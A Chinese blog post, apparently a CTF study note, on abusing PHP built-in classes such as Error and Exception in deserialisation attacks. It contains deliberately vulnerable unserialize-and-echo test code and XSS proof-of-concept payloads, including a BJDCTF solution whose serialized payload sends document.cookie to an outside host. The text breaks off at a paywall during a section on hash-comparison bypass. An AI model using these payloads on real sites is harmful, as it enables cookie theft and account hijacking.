php原生类的总结

最新推荐文章于 2023-11-13 00:12:36 发布
最新推荐文章于 2023-11-13 00:12:36 发布
阅读量6.1k 收藏 35
点赞数 8
CC 4.0 BY-SA版权
分类专栏: CTF训练日记 Web安全 文章标签: php web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/unexpectedthing/article/details/121780909

文章目录

前言

之所以这个总结,极客大挑战的SoEzunser考到了php原生类来遍历目录

其实,在CTF题目中,可以利用php原生类来进行XSS,反序列化,SSRF,XXE和读文件的思路

通过遍历看一下php的内置类

 <?php
$classes = get_declared_classes();
foreach ($classes as $class) {
   
    $methods = get_class_methods($class);
    foreach ($methods as $method) {
   
        if (in_array($method, array(
            '__destruct',
            '__toString',
            '__wakeup',
            '__call',
            '__callStatic',
            '__get',
            '__set',
            '__isset',
            '__unset',
            '__invoke',
            '__set_state'    // 可以根据题目环境将指定的方法添加进来, 来遍历存在指定方法的原生类
        ))) {
   
            print $class . '::' . $method . "\n";
        }
    }
} 

Exception::__wakeup
Exception::__toString
ErrorException::__wakeup
ErrorException::__toString
Error::__wakeup
Error::__toString
CompileError::__wakeup
CompileError::__toString
ParseError::__wakeup
ParseError::__toString
TypeError::__wakeup
TypeError::__toString
ArgumentCountError::__wakeup
ArgumentCountError::__toString
ArithmeticError::__wakeup
ArithmeticError::__toString
DivisionByZeroError::__wakeup
DivisionByZeroError::__toString
Generator::__wakeup
ClosedGeneratorException::__wakeup
ClosedGeneratorException::__toString
DateTime::__wakeup
DateTime::__set_state
DateTimeImmutable::__wakeup
DateTimeImmutable::__set_state
DateTimeZone::__wakeup
DateTimeZone::__set_state
DateInterval::__wakeup
DateInterval::__set_state
DatePeriod::__wakeup
DatePeriod::__set_state
JsonException::__wakeup
JsonException::__toString
LogicException::__wakeup
LogicException::__toString
BadFunctionCallException::__wakeup
BadFunctionCallException::__toString
BadMethodCallException::__wakeup
BadMethodCallException::__toString
DomainException::__wakeup
DomainException::__toString
InvalidArgumentException::__wakeup
InvalidArgumentException::__toString
LengthException::__wakeup
LengthException::__toString
OutOfRangeException::__wakeup
OutOfRangeException::__toString
RuntimeException::__wakeup
RuntimeException::__toString
OutOfBoundsException::__wakeup
OutOfBoundsException::__toString
OverflowException::__wakeup
OverflowException::__toString
RangeException::__wakeup
RangeException::__toString
UnderflowException::__wakeup
UnderflowException::__toString
UnexpectedValueException::__wakeup
UnexpectedValueException::__toString
CachingIterator::__toString
RecursiveCachingIterator::__toString
SplFileInfo::__toString
DirectoryIterator::__toString
FilesystemIterator::__toString
RecursiveDirectoryIterator::__toString
GlobIterator::__toString
SplFileObject::__toString
SplTempFileObject::__toString
SplFixedArray::__wakeup
ReflectionException::__wakeup
ReflectionException::__toString
ReflectionFunctionAbstract::__toString
ReflectionFunction::__toString
ReflectionParameter::__toString
ReflectionType::__toString
ReflectionNamedType::__toString
ReflectionMethod::__toString
ReflectionClass::__toString
ReflectionObject::__toString
ReflectionProperty::__toString
ReflectionClassConstant::__toString
ReflectionExtension::__toString
ReflectionZendExtension::__toString
AssertionError::__wakeup
AssertionError::__toString
DOMException::__wakeup
DOMException::__toString
PDOException::__wakeup
PDOException::__toString
PDO::__wakeup
PDOStatement::__wakeup
SimpleXMLElement::__toString
SimpleXMLIterator::__toString
SoapClient::__call
SoapFault::__toString
SoapFault::__wakeup
CURLFile::__wakeup
mysqli_sql_exception::__wakeup
mysqli_sql_exception::__toString
PharException::__wakeup
PharException::__toString
Phar::__destruct
Phar::__toString
PharData::__destruct
PharData::__toString
PharFileInfo::__destruct
PharFileInfo::__toString

只需要注意一些常用的内置类

Error
Exception
SoapClient
DirectoryIterator
FilesystemIterator
SplFileObject
SimpleXMLElement

参考资料

[PHP 原生类的利用小结 ](https://whoamianony.top/2021/03/10/Web安全/PHP 原生类的利用小结/)

感谢师傅的总结

利用Error/Exception 内置类进行 XSS

Error内置类

使用条件:

  • 适用于php7版本
  • 在开启报错的情况下

Error类是php的一个内置类,用于自动自定义一个Error,在php7的环境下可能会造成一个xss漏洞,因为它内置有一个 __toString() 的方法,常用于PHP 反序列化中。如果有个POP链走到一半就走不通了,可以尝试利用这个来做一个xss,直接利用xss来打。其实我看到的还是有好一些cms会选择直接使用 echo <Object> 的写法,当 PHP 对象被当作一个字符串输出或使用时候(如echo的时候)会触发__toString 方法,这也是挖洞的一种思路。

测试例子:

本地放一个error.php

<?php
$a = unserialize($_GET['cmd']);
echo $a;
?>

这里可以看到是一个反序列化函数,但是没有让我们进行反序列化的类,这就遇到了一个反序列化但没有POP链的情况,所以只能找到PHP内置类来进行反序列化

poc:

<?php
$a = new Error("<script>alert('xss')</script>");
$b = serialize($a);
echo urlencode($b);  
?>

直接可以弹出xss,触发了xss漏洞

Exception内置类

  • 适用于php5、7版本
  • 开启报错的情况下

原理是类似的

测试代码

<?php
$a = unserialize($_GET['cmd']);
echo $a;
?>

poc

<?php
$a = new Exception("<script>alert('xss')</script>");
$b = serialize($a);
echo urlencode($b);  
?>

[BJDCTF 2nd]xss之光

首先进入题目中,我们找到git泄露拿到源码

<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);

这就是一个典型的反序列化函数,但是没有给出反序列化的类,我们无法构造pop链,只有利用php内置类来反序列化,加上一个echo,我们就可以利用Error内置类来XSS

payload

<?php
$poc = new Exception("<script>window.open('http://de28dfb3-f224-48d4-b579-f1ea61189930.node3.buuoj.cn/?'+document.cookie);</script>");
echo urlencode(serialize($poc));
?>

一般xss的题都是在cookie理里,所以我们利用XSS把cookie带出来

/?yds_is_so_beautiful=O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A109%3A%22%3Cscript%3Ewindow.open%28%27http%3A%2F%2Fde28dfb3-f224-48d4-b579-f1ea61189930.node3.buuoj.cn%2F%3F%27%2Bdocument.cookie%29%3B%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A18%3A%22%2Fusercode%2Ffile.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D

然后flag就在cookie中

使用 Error/Exception 内置类绕过哈希比较

Error和Exception这两个PHP内置类,但对他们不限于 XSS,还可以通过巧妙的构造绕过md5()函数和sha1()函数的比较。

Error类

条件:php7.0.0

类介绍

Error implements Throwable {
   
	/* 属性 */
	protected string $message ;
	protected int $code ;
	protected string $file ;
	protected int $line ;
	/* 方法 */
	public __construct ( string $message = "" , int $code = 0 , Throwable $previous = null )
	final public getMessage ( ) : string
	final public getPrevious ( ) : Throwable
	final public getCode ( ) : mixed
	final public getFile ( ) : string
	final public getLine ( ) : int
	final public getTrace ( ) : array
	final public getTraceAsString ( ) : string
	public __toString ( ) : string
	final private __clone ( ) : void
}

类属性:

  • message:错误消息内容
  • code:错误代码
  • file:抛出错误的文件名
  • line:抛出错误在该文件中的行数

类方法:

Exception 类

条件:php5

类摘要

Exception {
   
	/* 属性 */
	protected string $message ;
	protected int $code ;
	protected string $file ;
	protected int $line ;
	/* 方法 */
	public __construct ( string $message = "" , int $code = 0 , Throwable $previous = null )
	final public getMessage ( ) : string
	final public getPrevious ( ) : Throwable
	final public getCode ( ) : mixed
	final public getFile ( ) : string
	final public getLine ( ) : int
	final public getTrace ( ) : array
	final public getTraceAsString ( ) : string
	public __toString ( ) : string
	final private __clone ( ) : void
}

类属性:

  • message:异常消息内容
  • code:异常代码
  • file:抛出异常的文件名
  • line:抛出异常在该文件中的行号

类方法:

最低0.47元/天 解锁文章

200万优质内容无限畅学
PHP 原生类学习与利用
snowlyzz的博客
09-22 1478
php 原生类利用与学习。
PHP反序列化总结4--原生类总结
最新发布
m0_66458291的博客
01-14 988
PHP 原生类指的是 PHP 内置的类,它们可以直接在 PHP 代码中使用且无需安装或导入任何库,相当于代码中的内置方法例如echo ,print等等可以直接调用,但是原生类就是可以就直接php中直接创建的类,我们可以直接调用创建对象,但是这些类中有的会有魔术方法,为此,我们可以创建原生类去利用其中的魔术方法来达到我们反序列化的利用。
php 连接mysql原生类
10-31
支持多个版本mysql数据库,通过配置文件连接,集成化,模块化
PHP原生类
qq_63928796的博客
11-09 1346
原生类就是php内置类,不用定义php自带的类,即不需要在当前脚本写出,但也可以实例化的类我们可以通过脚本找一下php原生类
php原生类,【翻译自nikic大神】PHP原生类型的方法
weixin_42537919的博客
03-09 252
引言第一次,翻译别人的文章,用四级英语的水平来翻译~~囧,可能有很多不太恰当的地方,尽管拍砖(有些地方实在想不到恰当的翻译,我同时贴出了原文和自己很low的翻译)。翻译这篇文章用了我3个晚上一个中午~,先弄明白技术上大体再说什么,然后在翻译的~这样做的目的一方面锻炼下自己的英文,一方面学习点国外的比较新的技术想法。这篇文章主要讲了对PHP中的原生类型实现面向对象的操作,通过扩展的方式实现,用来解决...
php原生类使用
weixin_44944193的博客
11-07 8684
类就是用{}包着的 对象也可以说是函数, 一个大类包着多个对象(函数) 看列子: <?php //声明类的方法,我们用class来声明我们的类. // class 类名 { 类的内容 } // 注:这里的$this是值当前的类 class test{ var $a; var $b = "111"; var $c = "我是c"; functi...
PHP原生函数一定好吗?
10-25
总结来说,虽然PHP原生函数为开发提供便利,但在某些情况下,开发者应该考虑自定义实现以获取更好的性能表现。通过具体案例的分析,我们了解到性能测试能够揭示不同实现之间的差异,帮助开发者作出更合理的选择。...
原生php登录增删改查
05-27
总结,原生PHP登录增删改查涉及了用户验证、密码处理、会话管理、SQL操作和安全措施等多个方面。理解并熟练掌握这些知识点,对于PHP开发者来说至关重要。而“小贵的项目”则为你提供了一个实践和学习这些概念的平台...
PHP原生类详解
qq_71467825的博客
06-21 1273
什么是php原生类PHP 原生类指的是 PHP 内置的类,它们可以直接在 PHP 代码中使用且无需安装或导入任何库。以下是一些常用的 PHP 原生类:1. DateTime 类:用于处理日期和时间,支持各种格式和时间区域。2. PDO 类:用于访问和操作关系型数据库,如 MySQL、PostgreSQL 等。3. FilesystemIterator 类:用于迭代文件系统目录,支持过滤器和递归。4. DOMDocument 类:用于创建和操作 XML 文档,支持 XPath 查询和转换。
php原生类,PHP原生类反序列化
weixin_39595164的博客
03-09 254
在做BJDCTF中的题目XSS之光的时候遇到了PHP原生类的反序列化,以前没有了解过,现在来学习一波。基础知识首先还是来回顾一下序列化中的魔术方法,下面也将以此进行分类来进行研究。当对象被创建的时候调用:__construct当对象被销毁的时候调用:__destruct当对象被当作一个字符串使用时候调用(不仅仅是echo的时候,比如file_exists()判断也会触发):__toString序列...
PHP原生类总结利用
qq_44640313的博客
11-13 2749
PHP原生类总结及例题
PHP原生类反序列化
Lemon's blog
03-27 1949
前言: PHP原生类反序列化之前没遇到过,这次BJDCTF恰好碰到了,通过具体的题目来学习一下 xss之光 开始用目录扫描器扫一下,发现是git泄露,下载下来,发现index.php文件 随便序列化一个传入试试,能输出 而且这和之前遇到过的反序列化问题就很不一样了,没有一个类,所以只能找到php内置类来进行反序列化 ...
初识PHP原生类
记录学习,一起进步
01-05 534
PHP原生类的认识
php原生类的简单总结
m0_62274649的博客
11-17 786
PHP原生类的简单总结
浅谈php原生类的利用 2(Error&SoapClient&SimpleXMLElement)
weixin_63231007的博客
01-19 2853
CTF中原生Error类&SoapClient类的一些利用
php学习记录六:原生php创建类
帆酱的博客
11-18 417
1、新建一个类文件ini_class.php 2、在文件里创建个类,这里我新建一个查询个人用户信息的类 <?php //类名为personal class personal{ // 新建公有方法,查询一个用户的信息 public function getUserInfo($link,$name,$id){ $query="select * from user where user_name='{$name}' or id='{$id}'"; $
Thinkphp 使用原生类
软件工程小施同学 的专栏
01-24 658
问题:thinphp代码里面不能直接new ClassName();这样的方式来实例化,会被提示找不到类 原因:因为这样写的命名空间是指当前,所以,应该这样实例化 new /ClassName();
【翻译自nikic大神】PHP原生类型的方法
dkmroy0030的博客
12-05 225
http://www.cnblogs.com/iforever/p/4599828.html 转载于:https://www.cnblogs.com/Lomio/p/6132863.html
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值